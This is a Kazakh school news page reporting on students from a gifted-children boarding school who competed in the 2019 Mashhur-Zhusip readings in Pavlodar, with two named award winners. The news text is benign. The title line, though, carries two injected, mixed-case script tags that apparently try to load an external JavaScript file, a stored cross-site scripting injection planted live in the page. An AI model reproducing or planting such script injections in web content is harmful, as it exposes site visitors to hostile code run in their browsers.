2018-2019 оқу жылының 15-16 мамыр аралығындағы І республикалық Мәшһүр-Жүсіп оқулары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.05.2019

2018-2019  оқу жылының 15-16 мамыр аралығында Павлодар қаласында 8-11 сынып оқушыларына арналған І республикалық Мәшһүр-Жүсіп оқулары өтті.

Байқаудың мақсаты − қазақ руханиятының таным-түсініктерінен мол мағлұмат беретін ұлы тұлғаның шығармашылығы бүгінгі егемен елдің елдігін суреттеуде көркемөнердің құндылықтары ретінде ұлттың сақтаушысы да болғандығын ескере отырып, Мәшһүр-Жүсіп Көпейұлы бабамыздың мұралары арқылы ел өткенін таныту, дала танымын насихаттау, шығармашыл жастардың дарындылығын айқындау және қолдау.

Аталмыш байқауда Ақмола облысының намысын  Астана қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 4 оқушысы  қатысты.

Байқау қорытындысы нәтижесінде Ақмола облысынан қатысқан оқушылардың арасында «Білімді зерек адам болам», − десең, Қара өзіңді басқалардың айнасымен» бағыты  бойынша Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 10 сынып оқушысы Іңкарқызы Жансая ІІІ дәрежелі дипломмен   марапатталды. Сонымен қатар, «Зерделі жас» номинациясы бойынша Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған  мектеп-интернатының 10 сынып оқушысы Қуанышева Мадинаға сертификат берілді.

Қатысушымызды жүлделі орнымен құттықтаймыз және алдағы уақытта шығармашылық белсенділік таныта беруіне тілектеспіз!

Просмотров: 487


Пікір қосу



Деректерді қолтаңбаға қосу